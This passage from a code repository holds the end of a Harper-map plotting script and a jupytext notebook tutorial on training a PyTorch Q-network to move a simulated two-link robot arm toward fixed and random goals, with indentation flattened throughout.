ax = fig.add_subplot(1,1,1)
sample=50
tmax = 500
k,a=1,1
cmap = HarperMap(k,a)
q = np.random.random(sample)
p = np.random.random(sample)
traj = [np.array([]),np.array([])]
for i in range(tmax):
q,p = Map(q,p,cmap)
q = q - np.floor(q)
p = p - np.floor(p)
traj[0] = np.append(traj[0],q)
traj[1] = np.append(traj[1],p)
ax.plot(traj[0],traj[1],',k')
plt.show()
# -
docs/tutorial/std.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Reinforcement Learning to Control a Robot Arm
#
# This notebook is based on a reinforcement learning assignment in Professor <NAME>'s machine learning course (CS545) at Colorado State University and is shared here with his permission. Changes to the original notebook include:
#
# * Neural network implementation in `Pytorch`, including GPU set up
# * Augmented state functions to include polar coordinates
# * Variable goal states
#
# The Robot class and state functions have been slightly modified to allow for random goal generation, otherwise the `Robot` class and `state` code is left as is from the assignment.
# ## Overview of problem setup
#
# This notebook walks through a Reinforcement Learning (RL) set up for a simulation of a two-dimensional robot arm with multiple links and joints. A neural network is used to approximate the Q function to predict the reinforcements from each action given a state. The reinforcement is the distance to a goal for the end of the robot's arm, and lower reinforcements are better.
#
# The state of the arm is the angles of each joint. As the state input to the neural network, joint angles are represented by the sine and cosine of each angle, to deal with the discontinuity between 1 and 359 degrees. The addition of polar coordinates to the state is also tested to see if this helps learning. Valid actions on each step will be $-0.1$, $0$, and $+0.1$ applied to each joint.
#
# The Q function is modeled with a neural network built using `Pytorch`; this is referred to as the `Qnet` throughout the notebook. The Pytorch implementation includes flags for running on the `cpu` and `gpu`. Model architecture is defined in the `MLP` class, and the number and size of layers is set dynamically from arguments to the constructor. Normalization layers are also added by default to help with model training. Traditional data normalization is challenging in RL models since the training data is generated during training, so we don't know the means and standard deviations beforehand. Adding layer normalization seems to have helped in this regard by improving the accuracy and speed of training.
#
# After initial testing of the training functions, a parameter grid search is performed to find a good model that can handle a variable goal state. Training results are sorted by the mean reinforcement, R, over the last 20 training trials, and the model with the lowest mean reinforcement is selected as the best model. Plots and animations are constructed to visualize the training performance of the parameter combinations.
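# As an aside, the idea behind the layer normalization mentioned above is simple: each sample is standardized across its own feature dimension, so no dataset-wide statistics are needed. A minimal numpy sketch of the core computation (PyTorch's `nn.LayerNorm` additionally learns a scale and shift, omitted here):

```python
import numpy as np

def layer_norm(x, eps=1e-5):
    """Normalise each row of x to zero mean and unit variance across
    its features -- the core of nn.LayerNorm without the learnable
    affine parameters."""
    mean = x.mean(axis=-1, keepdims=True)
    var = x.var(axis=-1, keepdims=True)
    return (x - mean) / np.sqrt(var + eps)

batch = np.array([[1.0, 2.0, 3.0],
                  [10.0, 20.0, 30.0]])
out = layer_norm(batch)
print(out.round(3))   # each row now has mean ~0 and std ~1
```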
# ## Set up
import numpy as np
import pandas as pd
from sklearn.model_selection import ParameterGrid
import copy
import matplotlib.pyplot as plt
import seaborn as sns
import sys
import itertools # for product (cross product)
from math import pi
from IPython.display import display, clear_output
import time
import joblib
# set plot size parameter
plt.rcParams["figure.figsize"] = (8,4.5)
# Import packages for model training.
# +
# import dl and ml packages
import torch
import torch.nn as nn
import torch.nn.functional as F
from sklearn.model_selection import ParameterGrid
from datetime import datetime
# -
# see if the GPU is available
torch.cuda.is_available()
# current gpu device number
torch.cuda.current_device()
# +
# This will set the device based on the GPUs availability
# the device will be updated later to test running on the GPU and CPU
if torch.cuda.is_available():
torch.cuda.set_device(0)
device = "cuda:" + str(torch.cuda.current_device())
else:
device = "cpu"
print(device)
# -
# # `Robot` Class
#
# Here is an implementation of the robot simulation:
class Robot():
def __init__(self, link_lengths):
self.n_links = len(link_lengths)
self.record_angles = False
self.angles = []
self.link_lengths = np.array(link_lengths)
self.joint_angles = np.zeros(self.n_links)
self.points = [[10, 10] for _ in range(self.n_links + 1)]
self.lim = sum(link_lengths)
self.update_points()
self.goal = None
def set_goal(self, g):
self.goal = g
def set_rand_goal(self):
theta = np.random.uniform(0, 2*pi)
radius = np.random.uniform(0, self.lim * 1.1)
x = radius*np.cos(theta)
y = radius*np.sin(theta)
self.goal = [x+10,y+10]
return None
def get_goal(self):
return self.goal
def get_theta_r_goal(self):
        goal = self.get_goal()  # use self, not the global robot instance
        goal = [goal[0]-10, goal[1]-10]
        theta = np.arctan2(goal[0], goal[1]) - pi/2
        r = np.sqrt(goal[0]**2 + goal[1]**2)  # Euclidean distance from the arm's base
return [theta, r]
def dist_to_goal(self):
return np.sqrt(np.sum((self.goal - self.end_effector)**2))
def update_joints(self, joint_angles):
self.joint_angles = joint_angles
self.update_points()
def add_to_joints(self, joint_angle_deltas):
if isinstance(joint_angle_deltas, torch.Tensor):
joint_angle_deltas = joint_angle_deltas.numpy()
self.joint_angles += joint_angle_deltas
too_high = self.joint_angles > 2 * pi
self.joint_angles[too_high] = self.joint_angles[too_high] - 2 * pi
too_low = self.joint_angles < 0
self.joint_angles[too_low] = self.joint_angles[too_low] + 2 * pi
if self.record_angles:
self.angles.append(self.joint_angles * 180 / pi)
self.update_points()
def update_points(self):
for i in range(1, self.n_links + 1):
self.points[i][0] = (self.points[i - 1][0]
+ self.link_lengths[i - 1] * np.cos(np.sum(self.joint_angles[:i])))
self.points[i][1] = (self.points[i - 1][1] +
self.link_lengths[i - 1] * np.sin(np.sum(self.joint_angles[:i])))
self.end_effector = np.array(self.points[self.n_links]).T
def get_angles(self):
return self.joint_angles
def get_link_lengths(self):
return self.link_lengths
def plot(self, style):
for i in range(self.n_links + 1):
            if i != self.n_links:
plt.plot([self.points[i][0], self.points[i + 1][0]],
[self.points[i][1], self.points[i + 1][1]], style)
plt.plot(self.points[i][0], self.points[i][1], 'k.')
plt.axis('off')
plt.axis('square')
plt.xlim([-1, 21])
plt.ylim([-1, 21])
def animate(self, n_steps, Qnet=None, state_f=None, show_all_steps=False, device='cpu'):
fig = plt.figure(figsize=(8, 8))
for i in range(n_steps):
if not show_all_steps:
fig.clf()
plt.scatter(self.goal[0], self.goal[1], s=80)
if Qnet:
action, Qvalue = epsilon_greedy(self, Qnet, valid_actions, state_f, epsilon=0, device=device)
else:
action = [0.1] * self.n_links
self.add_to_joints(action)
style = 'b-' if show_all_steps and i+1 == n_steps else 'r-'
self.plot(style)
if not show_all_steps:
clear_output(wait=True)
display(fig)
if not show_all_steps:
clear_output(wait=True)
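# The angle update in `add_to_joints` wraps each joint angle back into [0, 2*pi) after a step. Here is a standalone sketch of the same idea — a hypothetical helper, not part of the class — using `np.mod`, which handles any number of full turns at once rather than a single one:

```python
import numpy as np

def wrap_angles(angles):
    """Wrap each angle into the interval [0, 2*pi)."""
    return np.mod(np.asarray(angles, dtype=float), 2 * np.pi)

# values above 2*pi or below 0 are shifted back into range
wrapped = wrap_angles([7.0, -0.5, 1.0])
```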
# To use this class, first instantiate a robot by specifying the number of links and the lengths of each link as a list. Imagine the end of the last link of the robot has a gripper. Set the goal location for the gripper by calling `robot.set_goal()`.
#
# Then you can animate the robot for some number of steps.
robot = Robot([4, 3])
#robot.set_goal([10, 10])
robot.set_rand_goal()
print(robot.get_goal())
# goal in polar coordinates
robot.get_theta_r_goal()
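# As a sanity check on the polar conversion, here is a standalone sketch using the conventional `arctan2(y, x)` argument ordering (an assumption for illustration; the class uses its own, internally consistent angle convention) for a goal measured from the arm base at (10, 10):

```python
import numpy as np

def to_polar(goal, base=(10.0, 10.0)):
    """Convert a Cartesian goal to (theta, r) relative to the arm base."""
    dx, dy = goal[0] - base[0], goal[1] - base[1]
    theta = np.arctan2(dy, dx)  # angle measured from the +x axis
    r = np.hypot(dx, dy)        # Euclidean distance to the goal
    return theta, r

theta, r = to_polar((13.0, 14.0))  # goal 3 right and 4 up from the base
```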
# animate the robot for 50 steps
robot.animate(50)
# trace the steps of the robot
robot = Robot([4, 3])
robot.set_goal([4, 5])
robot.animate(100, show_all_steps=True)
# # Reinforcement Learning Problem for Controlling the Robot
# From the original assignment:
#
# To define the reinforcement learning problem for controlling this robot and trying to move the gripper as close to the goal as you can, we need to define the three main functions that define a reinforcement learning problem. These are pretty easy with the functions available to us in the `Robot` class. We will also need a function to represent the joint angles as sines and cosines.
#
# State functions with `*_w_angles` were added. These functions add the polar coordinates to the state, thus they return the Cartesian and polar coordinates for the state and the goal.
# +
def angles_to_sin_cos(angles):
return np.hstack((np.sin(angles), np.cos(angles)))
def get_state(robot):
state = np.hstack([angles_to_sin_cos(robot.get_angles()), robot.get_goal()])
return state
def get_state_w_angles(robot):
state = np.hstack([get_state(robot), # in cartesian coords
robot.get_angles(), robot.get_link_lengths(), robot.get_theta_r_goal()])
return state
def initial_state(robot):
    robot.update_joints(np.random.uniform(-2 * pi, 2 * pi, size=robot.n_links))
    state = np.hstack([angles_to_sin_cos(robot.get_angles()), robot.get_goal()])
    return state
def initial_state_w_angles(robot):
    state = initial_state(robot)
    angles = robot.get_angles()
    state_w_state_angles = np.hstack([state, angles, robot.get_link_lengths(), robot.get_theta_r_goal()])
    return state_w_state_angles
def next_state(robot, action):
    robot.add_to_joints(action)
    state = np.hstack([angles_to_sin_cos(robot.get_angles()), robot.get_goal()])
    return state
def next_state_w_angles(robot, action):
state = next_state(robot, action)
angles = robot.get_angles()
state_w_angles = np.hstack([state, angles, robot.get_link_lengths(), robot.get_theta_r_goal()])
return state_w_angles
def reinforcement(robot):
'''Objective is to move gripper to the goal location as quickly as possible.'''
dist_to_goal = robot.dist_to_goal()
return dist_to_goal
# -
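# The reinforcement signal above is just the gripper-to-goal distance. A self-contained sketch of the forward kinematics behind it (mirroring the cumulative-angle update in `update_points`, with the base at the origin for simplicity) and the resulting reward:

```python
import numpy as np

def end_effector(link_lengths, joint_angles):
    """Forward kinematics: each link's heading is the cumulative joint sum."""
    cum = np.cumsum(joint_angles)
    return np.array([np.sum(link_lengths * np.cos(cum)),
                     np.sum(link_lengths * np.sin(cum))])

def distance_reward(link_lengths, joint_angles, goal):
    """Smaller is better: Euclidean distance from gripper to goal."""
    return np.linalg.norm(end_effector(link_lengths, joint_angles) - goal)

links = np.array([4.0, 3.0])
tip = end_effector(links, np.array([0.0, 0.0]))  # arm stretched along +x
```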
# set up state functions dictionary to pass into training functions
def get_state_functions(polar_coord):
if polar_coord:
initial_state_f = initial_state_w_angles
next_state_f = next_state_w_angles
state_f = get_state_w_angles
else:
initial_state_f = initial_state
next_state_f = next_state
state_f = get_state
return {'initial_state_f':initial_state_f,
'next_state_f':next_state_f,
'state_f':state_f}
# The two main functions used in the simulations are `epsilon_greedy` and `make_samples`. `make_samples` creates a specified number of steps for each training trial. For each step in the trial, `make_samples` calls `epsilon_greedy`, which uses the `Qnet` to predict the `R` for each action given the current state. If a greedy action is selected, then the action with the lowest predicted `R` is returned; otherwise, a random action is returned. These random actions help to explore the state-action space. Early in training, most actions are random, allowing the `Qnet` to gain experience in the space. But as training progresses, most actions are greedy.
#
# `epsilon_greedy` is also used in the `animate` function in the `robot` class to get the actions for the animations.
def epsilon_greedy(robot, Qnet,
valid_actions,
state_f,
                   epsilon,  # probability of a random move
device
):
# not using variable goal in training
# state = angles_to_sin_cos(robot.get_angles())
# send Qnet to appropriate device
Qnet.to(device)
state = state_f(robot)
if np.random.uniform() < epsilon:
# Random Move
actioni = np.random.randint(valid_actions.shape[0])
action = valid_actions[actioni]
else:
# Greedy Move
state_x = np.tile(state,valid_actions.shape[0]).reshape(valid_actions.shape[0],-1)
xs = torch.from_numpy(np.hstack([state_x, valid_actions])).float().to(device)
Qs = Qnet(xs).reshape(-1,1)
ai = torch.argmin(Qs)
action = valid_actions[ai]
x = torch.from_numpy(np.hstack((state, action)).reshape((1, -1))).float().to(device)
Q = Qnet(x)
return action, Q
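# The greedy branch tiles the state once per candidate action so the network can score every action in a single batch. The same tiling pattern, sketched with a dummy scoring function standing in for `Qnet` (everything here is toy data for illustration):

```python
import numpy as np

state = np.array([0.5, -0.2])                     # some state vector
valid_actions = np.array([[-0.1], [0.0], [0.1]])  # one joint, three moves

# repeat the state once per action, then pair each copy with an action
state_x = np.tile(state, valid_actions.shape[0]).reshape(valid_actions.shape[0], -1)
xs = np.hstack([state_x, valid_actions])

def dummy_q(batch):
    """Stand-in for Qnet: pretend the predicted cost is lowest at +0.1."""
    return np.abs(batch[:, -1] - 0.1)

greedy_action = valid_actions[np.argmin(dummy_q(xs))]
```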
def make_samples(robot, Qnet, n_inputs, reinforcement_f,
valid_actions, n_samples, epsilon,
state_funcs,
random_goal=False,
device=device):
debug = False
# get state functions from state_func dictionary
initial_state_f = state_funcs['initial_state_f']
next_state_f = state_funcs['next_state_f']
state_f = state_funcs['state_f']
if debug: print('allocating vectors')
X = torch.from_numpy(np.zeros((n_samples, n_inputs))).to(device)
R = torch.from_numpy(np.zeros((n_samples, 1))).to(device)
Qn = torch.from_numpy(np.zeros((n_samples, 1))).to(device)
if debug: print('setting up state')
# update random goal
if random_goal:
robot.set_rand_goal()
state = initial_state_f(robot)
state = next_state_f(robot, [0] * robot.n_links) # 0 action for all joints
action, _ = epsilon_greedy(robot, Qnet, valid_actions, state_f, epsilon, device)
# Collect data from numSamples steps
for step in range(n_samples):
if debug:
print('_____________')
print(f'step: {step}')
print('setting up state')
next_state = next_state_f(robot, action)
r = reinforcement_f(robot)
if debug: print('epsilon greedy')
next_action, next_Q = epsilon_greedy(robot, Qnet, valid_actions, state_f, epsilon, device)
if debug: print('save results')
X[step, :] = torch.from_numpy(np.hstack((state, action)))
R[step, 0] = r
Qn[step, 0] = torch.detach(next_Q)
# Advance one time step
state, action = next_state, next_action
return (X, R, Qn)
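# `make_samples` returns the ingredients of the one-step temporal-difference target used later in `train`: `y = R + gamma * Qn`. With the reinforcement being a distance to be minimized, the arithmetic looks like this (toy numbers):

```python
import numpy as np

gamma = 0.8
R = np.array([[5.0], [2.0], [0.5]])   # distance to goal at each step
Qn = np.array([[4.0], [1.0], [0.1]])  # Qnet's estimate for the next step

# bootstrap target: immediate cost plus discounted future estimate
y = R + gamma * Qn
```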
# ## `MLP` Class
#
# This defines a class to construct an MLP using PyTorch. The inputs to the constructor are as follows:
# * input_size: the number of variables in the state-action space (i.e. number of columns in X)
# * h_sizes: a list with number of hidden units in each layer, `[20,10]` constructs a two layer model with `20` and `10` hidden units respectively
# * n_out: the dimension of the output (i.e. the number of columns in Y)
# * act_func: the activation function to use; currently supports "tanh", "elu", "relu", "sigmoid"
# * use_layer_norm: Boolean flag for adding layer normalization
#
# The number and size of the layers is dynamically defined using `h_sizes`. In the constructor, this is converted to an `nn.ModuleList`, so the layers will be tracked and the layer weights saved when checkpointing the model. The `forward` function calculates a forward pass based on the model definition, which PyTorch uses to set up the automatic differentiation in the backward pass. `model_to_dict` is a convenience function to save the model definition to a dictionary, so the model can be recreated from file and the checkpointed weights loaded into the model.
# +
# see this excellent article on normalization techniques
# https://mlexplained.com/2018/11/30/an-overview-of-normalization-methods-in-deep-learning/
class MLP(nn.Module):
def __init__(self, input_size, h_sizes, n_out, act_func = 'tanh', use_layer_norm=True):
        '''act_func: one of "tanh", "elu", "relu", "sigmoid"
defaults to "tanh"
'''
super(MLP, self).__init__()
self.input_size = input_size
self.h_sizes = h_sizes
self.n_out = n_out
self.act_func = act_func
self.use_layer_norm = use_layer_norm
# Hidden layers
        # use nn.ModuleList() so layers will be available in state_dict
self.hidden = nn.ModuleList()
# layer normalization layers
if self.use_layer_norm:
self.ln = nn.ModuleList()
else:
self.ln = None
# create a list of layer sizes to use in model construction
sizes = [input_size] + h_sizes # + [n_out]
# build model
for k in range(len(sizes)-1):
self.hidden.append(nn.Linear(sizes[k], sizes[k+1]))
if self.use_layer_norm:
self.ln.append(nn.LayerNorm(sizes[k+1]))
# Output layer
self.out = nn.Linear(sizes[-1], self.n_out)
# save model architecture to dictionary
def model_to_dict(self):
model_dict = {'input_size':self.input_size,
'h_sizes':self.h_sizes,
'n_out':self.n_out,
'act_func':self.act_func,
'use_layer_norm':self.use_layer_norm}
return(model_dict)
# forward pass calculation
def forward(self, x):
# set activation function
if self.act_func == 'elu':
act = nn.ELU()
elif self.act_func == 'relu':
act = nn.ReLU()
elif self.act_func == 'sigmoid':
act = nn.Sigmoid()
else: # default to tanh
act = nn.Tanh()
# x needs to be torch tensor
        if isinstance(x, np.ndarray):
x = torch.from_numpy(x).float()
# Feedforward
for i in range(len(self.hidden)):
layer = self.hidden[i]
if self.use_layer_norm:
ln = self.ln[i]
x = act(ln(layer(x)))
else:
x = act(layer(x))
        output = self.out(x)
return output
# -
test = MLP(10, [20,20], 1, 'elu')
test.model_to_dict()
test.hidden
test.ln
# # Reinforcement Learning Training Algorithm
#
# The `train` function wraps up all of the previous work into a function that can be used for setting up training. Its inputs are:
# * robot: member of the robot class to model
# * state_funcs: a dictionary containing the state functions with the keys - 'initial_state_f', 'next_state_f', 'state_f'
# * valid_actions: an array of all the permutations of possible actions
# * n_hiddens_list: list containing the sizes of the hidden layers
# * n_trials: number of training trials to run (i.e., the number of calls to `make_samples`)
# * n_steps_per_trial: the number of steps created in each call to `make_samples`
# * n_opt_iterations: the number of steps taken by the optimizer after each call to `make_samples`
# * final_epsilon: the final probability for taking a random move
# * gamma: the discount rate for future reinforcements
# * learning_rate: step size for the optimizer
# * act_func: activation function to use in the MLP
# * random_goal: boolean flag for generating a random goal for each run of `make_samples`
# * device: GPU or CPU string, like 'cpu' or 'cuda:0'
#
# This function returns the trained Qnet and traces from the training.
# +
# define weights initialization function
# first checks the module type
# then applies the desired changes to the weights
def init_normal(m):
if type(m) == nn.Linear:
nn.init.uniform_(m.weight)
def train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func='tanh',
random_goal=False,
device=device
):
# get state_funcs based on boolean value of polar_coord
state_funcs = get_state_functions(polar_coord)
# get state functions from state_func dictionary
initial_state_f = state_funcs['initial_state_f']
next_state_f = state_funcs['next_state_f']
state_f = state_funcs['state_f']
# flag for printing losses
print_losses = False
# to produce this final epsilon value
final_trial_decay = (n_trials-20) if (n_trials-20) > 20 else n_trials
epsilon_decay = np.exp(np.log(final_epsilon+0.00001) / (final_trial_decay))
    # valid_actions stays on the CPU as a tensor; epsilon_greedy combines it
    # with numpy arrays via np.hstack, which requires CPU data
    valid_actions = torch.from_numpy(valid_actions)
# instantiate Qnet
n_inputs = len(initial_state_f(robot)) + valid_actions.shape[1]
Qnet = MLP(n_inputs, n_hiddens_list, n_out=1, act_func=act_func)
Qnet.to(device)
# apply the initialization strategy to the model weights
Qnet.apply(init_normal)
# define loss function
loss_fn = torch.nn.MSELoss(reduction='mean')
# Use the optim module to define an Optimizer that will update the model weights
optimizer = torch.optim.Adam(Qnet.parameters(), lr=learning_rate)
# initial epsilon value for taking random or greedy actions
epsilon = 1
epsilon_trace = []
r_mean_trace = []
r_trace = []
loss_trace = []
print('Starting trials')
print('______________________________________________\n')
# start learning trials
for trial in range(n_trials):
# Collect n_steps_per_trial samples
X, R, Qn = make_samples(robot, Qnet, n_inputs,
reinforcement, valid_actions,
n_steps_per_trial, epsilon,
state_funcs,
random_goal,
device)
# create targets for Qnet
y = (R + gamma * Qn).float()
# train Qnet
for t in range(n_opt_iterations):
# Forward pass
y_pred = Qnet(X.float())
# Compute and print loss
loss = loss_fn(y_pred, y)
if print_losses and t % 100 == 99:
print(t, loss.item())
# Zero gradients, perform a backward pass, and update the weights
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Update traces
epsilon_trace = epsilon_trace + [epsilon]
r_mean_trace = r_mean_trace + [np.mean(R.cpu().numpy())]
r_trace = r_trace + list(itertools.chain.from_iterable(R))
loss_trace = loss_trace + [loss_fn(y_pred, y).detach().cpu().numpy()]
# Decay epsilon for taking greedy or random actions
epsilon *= epsilon_decay
# print training progress
n_prints = np.min([250, (n_trials // 10)])
# if trial + 1 == n_trials or (trial + 1) % (n_trials // 10) == 0:
if trial + 1 == n_trials or (trial + 1) % (n_prints) == 0:
r = np.mean(r_mean_trace[-10:])
l = np.mean(loss_trace[-10:])
print(f'Trial - {trial+1}: Mean R {r:.3f} - MSE loss {l:.3f}')
return Qnet, state_funcs, r_mean_trace, r_trace, loss_trace, epsilon_trace
# -
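# The epsilon schedule in `train` multiplies epsilon by a fixed decay each trial, so it falls from 1 to roughly `final_epsilon` over the chosen number of trials. The same schedule, isolated from the rest of the training loop:

```python
import numpy as np

n_trials = 1000
final_epsilon = 0.01
final_trial_decay = (n_trials - 20) if (n_trials - 20) > 20 else n_trials
decay = np.exp(np.log(final_epsilon + 0.00001) / final_trial_decay)

epsilon = 1.0
trace = []
for _ in range(n_trials):
    trace.append(epsilon)
    epsilon *= decay
```

By construction, epsilon reaches approximately `final_epsilon` at trial `final_trial_decay` and keeps shrinking for the remaining trials.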
# ## Test Training
# * Instantiate robot
# * Set up action space
# * Get state
# * Set training parameters
# * Run train function
# * Build plots and animations
# set up a matrix of valid actions to choose from
single_joint_actions = [-0.1, 0, 0.1]
valid_actions = np.array(list(itertools.product(single_joint_actions, repeat=robot.n_links)))
valid_actions
# ### Train with a Fixed Goal and without Polar Coordinates
#
# For this first test, I'll train the model without the use of polar coordinates in the state space. I'll run the experiment with a larger number of trials compared to the number of samples in each trial. This will give the model more experience learning the state-action space, since the Qnet is updated after each trial. This model will be trained with a fixed goal. Since this is for testing, using a fixed goal will reduce the training time needed to ensure that the components are working correctly. After these tests are completed, I'll test a variable-goal model.
# +
# instantiate robot and set goal
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# set up parameters for training
n_hiddens_list = [64, 64]
n_trials = 1000
n_steps_per_trial = 128
n_opt_iterations = 10
final_epsilon = 0.01
gamma = 0.8
learning_rate = 0.001
act_func = 'relu'
random_goal = False
polar_coord = False
device = 'cpu'
# +
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, _, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
print(f'elapsed minutes: {(t1-t0)/60}')
# +
device = 'cuda:0'
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
print(f'elapsed minutes: {(t1-t0)/60}')
# -
# save experiment in dictionary
experiment_test = {'params':None,
'r_mean_trace_list':[r_mean_trace],
'loss_trace_list':[loss_trace],
'epsilon_trace_list':[epsilon_trace],
'robot':robot,
'best_Qnet_model':Qnet.model_to_dict(),
'checkpoint':{'state_dict': Qnet.state_dict()}}
# #### Test saving and loading Qnet from file
# save model definition and weights
torch.save({'state_dict': Qnet.state_dict()}, 'experiment/Qnet_state_test.pth')
joblib.dump(Qnet.model_to_dict(), 'experiment/Qnet_model_test.joblib')
# load dictionary with the model definition for the best Qnet
Qnet_model = joblib.load('experiment/Qnet_model_test.joblib')
Qnet_model
# +
# build model from definition
Qnet = MLP(Qnet_model['input_size'],
Qnet_model['h_sizes'],
Qnet_model['n_out'],
Qnet_model['act_func'],
Qnet_model['use_layer_norm'])
Qnet.model_to_dict()
# +
# load model state from best Qnet
checkpoint = torch.load('experiment/Qnet_state_test.pth')
# load model weights from best Qnet
Qnet.load_state_dict(checkpoint['state_dict'])
# -
# define function to plot experiment
def plot_experiment(experiment, index=0):
'''experiment is a dictionary containing:
params - DataFrame containing parameters and Qnet
r_mean_trace_list - list containing r_mean_traces from trials
r_trace_list - list containing r_traces from trials
epsilon_trace_list - list containing epsilon_traces from trials'''
plt.figure(figsize=(10, 10))
plt.clf()
plt.subplot(3, 1, 1)
plt.plot(experiment['r_mean_trace_list'][index])
plt.xlabel('Trial')
plt.ylabel('Mean R per Trial')
plt.subplot(3, 1, 2)
plt.plot(experiment['loss_trace_list'][index])
plt.xlabel('Trial')
plt.ylabel('MSE')
plt.subplot(3, 1, 3)
plt.plot(experiment['epsilon_trace_list'][index])
plt.xlabel('Trial')
plt.ylabel('Epsilon')
# plot training traces
plot_experiment(experiment_test)
# run robot animations
state_funcs = get_state_functions(polar_coord)
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'])
# show trace of animation steps
np.random.seed(4444)
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'], show_all_steps=True)
# ### Train with a Fixed Goal and with Polar Coordinates
#
# This test will use the same training parameters as the previous test, with the addition of polar coordinates to the state space. I'm curious to see if this extra information will help the Qnet learn the state-action space better and/or faster than only using Cartesian coordinates. In particular, I wonder if the model using only the Cartesian coordinates has to learn how to approximate some of the trigonometric transformations that are included in the polar coordinates. If that's the case, then my thought is that the model may learn faster if it doesn't have to learn these approximations, since they are provided in the state space.
# +
# add polar coordinates to state
polar_coord = True
# instantiate robot and set goal
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
# -
print(f'elapsed minutes: {(t1-t0)/60}')
# save experiment in dictionary
experiment_test = {'params':None,
'r_mean_trace_list':[r_mean_trace],
'loss_trace_list':[loss_trace],
'epsilon_trace_list':[epsilon_trace],
'robot':robot,
'best_Qnet_model':Qnet.model_to_dict(),
'checkpoint':{'state_dict': Qnet.state_dict()}}
# plot training traces
plot_experiment(experiment_test)
# run robot animations
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'])
# show trace of animation steps
np.random.seed(4444)
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'], show_all_steps=True)
# ### Polar Coordinate Test Results
#
# With this initial testing, the polar coordinates did not provide a substantial improvement in learning. I'll test training with polar coordinates with a larger model to see if increasing model complexity will allow it to make better use of the additional information.
#
# ### Train with Variable Goal
#
# To train the model with a variable goal, I will increase the number of trials and steps per trial and train a larger network. Since the Qnet updates after every trial, this will allow the model to explore and learn the more complex state-action space that now includes a moving goal and polar coordinates.
# +
# instantiate robot and set goal
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# set up parameters for training
n_hiddens_list = [256, 256]
n_trials = 10000
n_steps_per_trial = 256
n_opt_iterations = 35
final_epsilon = 0.001
gamma = 0.8
learning_rate = 0.001
act_func = 'elu'
random_goal = True
polar_coord = True
device = 'cuda:0'
# +
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
# -
print(f'elapsed minutes: {(t1-t0)/60}')
np.mean(r_mean_trace[-20:])
# save experiment in dictionary
experiment_test = {'params':None,
'r_mean_trace_list':[r_mean_trace],
'loss_trace_list':[loss_trace],
'epsilon_trace_list':[epsilon_trace],
'robot':robot,
'best_Qnet_model':Qnet.model_to_dict(),
'checkpoint':{'state_dict': Qnet.state_dict()}}
# plot training traces
plot_experiment(experiment_test)
# run robot animations
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'])
# show trace of animation steps
np.random.seed(4444)
# get state_funcs based on boolean value of polar_coord
state_funcs = get_state_functions(polar_coord)
initial_state(robot)
robot.animate(100, Qnet, state_funcs['state_f'], show_all_steps=True)
# # RL Experiments
# * Instantiate robot
# * Set up parameter grid for model selection
# * Train over parameter grid
# * Save best model definition and state during training
# * Load best model
# * Generate plots
# * Generate animations
#
# See https://docs.nvidia.com/deeplearning/performance/dl-performance-fully-connected/index.html#checklist for tips to improve GPU performance. From the documentation:
#
# ...choosing the batch size and the number of inputs and outputs to be divisible by at least 64 and ideally 256 can streamline tiling and reduce overhead...
#
# Steps per trial works like a batch size, so I'll set the steps per trial, as well as the number of nodes in the hidden layers, to be divisible by 64.
# instantiate robot
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# +
# create a parameter grid to search over
random_goal = True
polar_coord = [True, False]
device = 'cuda:0'
# set up lists of parameters to search over
n_hiddens_list = [
[256, 256],
[512, 512],
[768, 768],
# [1024, 1024]
]
n_trials = [10000]
n_steps_per_trial = [256]
n_opt_iterations = [15, 35, 75]
final_epsilon = [0.01]
gamma = [0.8]
learning_rate = [0.001]
act_func = ['elu'] # 'relu', 'sigmoid' , 'elu', 'tanh'
grid = {
'polar_coord' : polar_coord,
'n_hiddens_list' : n_hiddens_list,
'n_trials' : n_trials,
'n_steps_per_trial' : n_steps_per_trial,
'n_opt_iterations' : n_opt_iterations,
'final_epsilon' : final_epsilon,
'gamma' : gamma,
'learning_rate' : learning_rate,
'act_func' : act_func,
}
# create parameter grid
params = ParameterGrid(grid)
params = pd.DataFrame(params)
params['mean_last_20_r'] = None
params['state_funcs'] = None
# allocate lists to hold traces from training
r_mean_trace_list = [None] * params.shape[0]
loss_trace_list = [None] * params.shape[0]
epsilon_trace_list = [None] * params.shape[0]
params
